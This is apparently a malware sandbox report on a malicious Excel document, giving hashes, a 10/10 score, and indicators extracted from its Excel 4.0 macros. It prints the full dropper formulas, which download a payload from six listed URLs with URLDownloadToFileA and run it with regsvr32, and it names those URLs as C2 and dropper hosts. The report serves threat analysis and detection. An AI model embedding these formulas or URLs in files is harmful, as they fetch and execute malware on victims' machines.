General

  • Target

    f441386ecf9ef5ba7681011a6cb6a8f49b158e26bdaab525c299ec83cdb03d37

  • Size

    40KB

  • Sample

    241120-r5qzysykd1

  • MD5

    6e7a2c9d96b16e0e4874556361d40bd4

  • SHA1

    3782ed1279089b382e70aaacc4a712d701790fe7

  • SHA256

    f441386ecf9ef5ba7681011a6cb6a8f49b158e26bdaab525c299ec83cdb03d37

  • SHA512

    101cd9c51a2a36974addc1137369a1a050385e89d8866fadb321d7e1ed4c2fda898fd97ec0786eff51a1e35b4f106b6cfb2f876ad716d66ee1f890700903c408

  • SSDEEP

    768:O/omdH+DOevZCwttqyKfcrND59V+L9Rw4eWrXcTqZ0VP2HLp:SomdH+DoylND59V4jwmXc2CVCF

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://vipteck.com/wp-content/M/

https://shofarshoshanna.com/t0ssm/roE/

https://santacruzam.com/wp-admin/FeDgNEP/

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

https://kingspointresidence.com/camelia-diamond_/G/

https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipteck.com/wp-content/M/","..\aew.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://shofarshoshanna.com/t0ssm/roE/","..\aew.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://santacruzam.com/wp-admin/FeDgNEP/","..\aew.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/","..\aew.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://kingspointresidence.com/camelia-diamond_/G/","..\aew.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/","..\aew.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://vipteck.com/wp-content/M/

xlm40.dropper

https://shofarshoshanna.com/t0ssm/roE/

xlm40.dropper

https://santacruzam.com/wp-admin/FeDgNEP/

xlm40.dropper

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

xlm40.dropper

https://kingspointresidence.com/camelia-diamond_/G/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://vipteck.com/wp-content/M/

xlm40.dropper

https://shofarshoshanna.com/t0ssm/roE/

xlm40.dropper

https://santacruzam.com/wp-admin/FeDgNEP/

xlm40.dropper

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

Targets

    • Target

      f441386ecf9ef5ba7681011a6cb6a8f49b158e26bdaab525c299ec83cdb03d37

    • Size

      40KB

    • MD5

      6e7a2c9d96b16e0e4874556361d40bd4

    • SHA1

      3782ed1279089b382e70aaacc4a712d701790fe7

    • SHA256

      f441386ecf9ef5ba7681011a6cb6a8f49b158e26bdaab525c299ec83cdb03d37

    • SHA512

      101cd9c51a2a36974addc1137369a1a050385e89d8866fadb321d7e1ed4c2fda898fd97ec0786eff51a1e35b4f106b6cfb2f876ad716d66ee1f890700903c408

    • SSDEEP

      768:O/omdH+DOevZCwttqyKfcrND59V+L9Rw4eWrXcTqZ0VP2HLp:SomdH+DoylND59V4jwmXc2CVCF

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks